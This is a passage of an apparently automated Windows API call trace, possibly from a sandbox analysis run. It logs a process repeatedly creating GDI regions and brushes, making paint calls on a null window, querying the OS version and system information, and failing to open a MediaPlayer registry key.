returned 0 [0087.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.715] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.716] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401d3 [0087.716] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401d6 [0087.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a56 [0087.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a57 [0087.716] CombineRgn (hrgnDst=0x1040a56, hrgnSrc1=0x420401d3, hrgnSrc2=0x400401d6, iMode=1) returned 1 [0087.716] CombineRgn (hrgnDst=0x1040a57, hrgnSrc1=0x420401d3, hrgnSrc2=0x400401d6, iMode=4) returned 2 [0087.716] CreateSolidBrush (color=0xff) returned 0x2100a55 [0087.716] CreateSolidBrush (color=0xff0000) returned 0x1100a58 [0087.716] DeleteObject (ho=0x1100a58) returned 1 [0087.716] DeleteObject (ho=0x400401d6) returned 1 [0087.716] DeleteObject (ho=0x420401d3) returned 1 [0087.716] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.716] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.716] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.716] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.716] BeginPath (hdc=0x0) returned 0 [0087.716] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.716] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.716] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.716] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.716] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401d6 [0087.716] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401d3 [0087.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a59 [0087.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5a [0087.716] CombineRgn (hrgnDst=0x1040a59, hrgnSrc1=0x410401d6, hrgnSrc2=0x430401d3, iMode=1) returned 1 [0087.716] CombineRgn (hrgnDst=0x1040a5a, hrgnSrc1=0x410401d6, hrgnSrc2=0x430401d3, iMode=4) returned 2 [0087.716] CreateSolidBrush (color=0xff) returned 0x2100a58 [0087.716] CreateSolidBrush (color=0xff0000) returned 0x1100a5b [0087.716] DeleteObject (ho=0x1100a5b) returned 1 [0087.716] DeleteObject (ho=0x430401d3) returned 1 [0087.716] DeleteObject (ho=0x410401d6) returned 1 [0087.716] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.716] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.717] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.717] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.717] BeginPath (hdc=0x0) returned 0 [0087.717] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.717] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.717] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.717] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.717] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401d3 [0087.717] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401d6 [0087.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5c [0087.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5d [0087.717] CombineRgn (hrgnDst=0x1040a5c, hrgnSrc1=0x440401d3, hrgnSrc2=0x420401d6, iMode=1) returned 1 [0087.717] CombineRgn (hrgnDst=0x1040a5d, hrgnSrc1=0x440401d3, hrgnSrc2=0x420401d6, iMode=4) returned 2 [0087.717] CreateSolidBrush (color=0xff) returned 0x2100a5b [0087.717] CreateSolidBrush (color=0xff0000) returned 0x1100a5e [0087.717] DeleteObject (ho=0x1100a5e) returned 1 [0087.717] DeleteObject (ho=0x420401d6) returned 1 [0087.717] DeleteObject (ho=0x440401d3) returned 1 [0087.717] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.717] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.717] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.717] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.717] BeginPath (hdc=0x0) returned 0 [0087.717] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.717] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.717] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.717] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.717] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401d6 [0087.718] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401d3 [0087.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a5f [0087.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a60 [0087.718] CombineRgn (hrgnDst=0x1040a5f, hrgnSrc1=0x430401d6, hrgnSrc2=0x450401d3, iMode=1) returned 1 [0087.718] CombineRgn (hrgnDst=0x1040a60, hrgnSrc1=0x430401d6, hrgnSrc2=0x450401d3, iMode=4) returned 2 [0087.718] CreateSolidBrush (color=0xff) returned 0x2100a5e [0087.718] CreateSolidBrush (color=0xff0000) returned 0x1100a61 [0087.718] DeleteObject (ho=0x1100a61) returned 1 [0087.718] DeleteObject (ho=0x450401d3) returned 1 [0087.718] DeleteObject (ho=0x430401d6) returned 1 [0087.718] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.718] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.718] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.718] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.718] BeginPath (hdc=0x0) returned 0 [0087.718] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.718] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.718] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.718] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.718] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401d3 [0087.718] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401d6 [0087.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a62 [0087.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a63 [0087.718] CombineRgn (hrgnDst=0x1040a62, hrgnSrc1=0x460401d3, hrgnSrc2=0x440401d6, iMode=1) returned 1 [0087.718] CombineRgn (hrgnDst=0x1040a63, hrgnSrc1=0x460401d3, hrgnSrc2=0x440401d6, iMode=4) returned 2 [0087.718] CreateSolidBrush (color=0xff) returned 0x2100a61 [0087.718] CreateSolidBrush (color=0xff0000) returned 0x1100a64 [0087.718] DeleteObject (ho=0x1100a64) returned 1 [0087.718] DeleteObject (ho=0x440401d6) returned 1 [0087.718] DeleteObject (ho=0x460401d3) returned 1 [0087.718] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.718] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.718] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.718] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.718] BeginPath (hdc=0x0) returned 0 [0087.718] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.718] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.719] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.719] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.719] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401d6 [0087.719] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401d3 [0087.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a65 [0087.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a66 [0087.719] CombineRgn (hrgnDst=0x1040a65, hrgnSrc1=0x450401d6, hrgnSrc2=0x470401d3, iMode=1) returned 1 [0087.719] CombineRgn (hrgnDst=0x1040a66, hrgnSrc1=0x450401d6, hrgnSrc2=0x470401d3, iMode=4) returned 2 [0087.719] CreateSolidBrush (color=0xff) returned 0x2100a64 [0087.719] CreateSolidBrush (color=0xff0000) returned 0x1100a67 [0087.719] DeleteObject (ho=0x1100a67) returned 1 [0087.719] DeleteObject (ho=0x470401d3) returned 1 [0087.719] DeleteObject (ho=0x450401d6) returned 1 [0087.719] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.719] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.719] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.719] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.719] BeginPath (hdc=0x0) returned 0 [0087.719] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.719] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.719] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.719] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.719] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401d3 [0087.719] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401d6 [0087.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a68 [0087.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a69 [0087.719] CombineRgn (hrgnDst=0x1040a68, hrgnSrc1=0x480401d3, hrgnSrc2=0x460401d6, iMode=1) returned 1 [0087.719] CombineRgn (hrgnDst=0x1040a69, hrgnSrc1=0x480401d3, hrgnSrc2=0x460401d6, iMode=4) returned 2 [0087.720] CreateSolidBrush (color=0xff) returned 0x2100a67 [0087.720] CreateSolidBrush (color=0xff0000) returned 0x1100a6a [0087.720] DeleteObject (ho=0x1100a6a) returned 1 [0087.720] DeleteObject (ho=0x460401d6) returned 1 [0087.720] DeleteObject (ho=0x480401d3) returned 1 [0087.720] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.720] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.720] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.720] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.720] BeginPath (hdc=0x0) returned 0 [0087.720] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.720] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.720] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.720] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.720] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401d6 [0087.720] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401d3 [0087.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6b [0087.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6c [0087.720] CombineRgn (hrgnDst=0x1040a6b, hrgnSrc1=0x470401d6, hrgnSrc2=0x490401d3, iMode=1) returned 1 [0087.720] CombineRgn (hrgnDst=0x1040a6c, hrgnSrc1=0x470401d6, hrgnSrc2=0x490401d3, iMode=4) returned 2 [0087.720] CreateSolidBrush (color=0xff) returned 0x2100a6a [0087.720] CreateSolidBrush (color=0xff0000) returned 0x1100a6d [0087.720] DeleteObject (ho=0x1100a6d) returned 1 [0087.720] DeleteObject (ho=0x490401d3) returned 1 [0087.720] DeleteObject (ho=0x470401d6) returned 1 [0087.720] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.720] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.720] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.720] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.720] BeginPath (hdc=0x0) returned 0 [0087.720] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.720] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.720] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.720] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.721] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.721] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401d3 [0087.721] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401d6 [0087.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6e [0087.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a6f [0087.721] CombineRgn (hrgnDst=0x1040a6e, hrgnSrc1=0x4a0401d3, hrgnSrc2=0x480401d6, iMode=1) returned 1 [0087.721] CombineRgn (hrgnDst=0x1040a6f, hrgnSrc1=0x4a0401d3, hrgnSrc2=0x480401d6, iMode=4) returned 2 [0087.721] CreateSolidBrush (color=0xff) returned 0x2100a6d [0087.721] CreateSolidBrush (color=0xff0000) returned 0x1100a70 [0087.721] DeleteObject (ho=0x1100a70) returned 1 [0087.721] DeleteObject (ho=0x480401d6) returned 1 [0087.721] DeleteObject (ho=0x4a0401d3) returned 1 [0087.721] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.721] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.721] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.721] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.721] BeginPath (hdc=0x0) returned 0 [0087.721] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.721] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.721] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.721] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.721] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401d6 [0087.721] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401d3 [0087.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a71 [0087.721] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a72 [0087.721] CombineRgn (hrgnDst=0x1040a71, hrgnSrc1=0x490401d6, hrgnSrc2=0x4b0401d3, iMode=1) returned 1 [0087.721] CombineRgn (hrgnDst=0x1040a72, hrgnSrc1=0x490401d6, hrgnSrc2=0x4b0401d3, iMode=4) returned 2 [0087.721] CreateSolidBrush (color=0xff) returned 0x2100a70 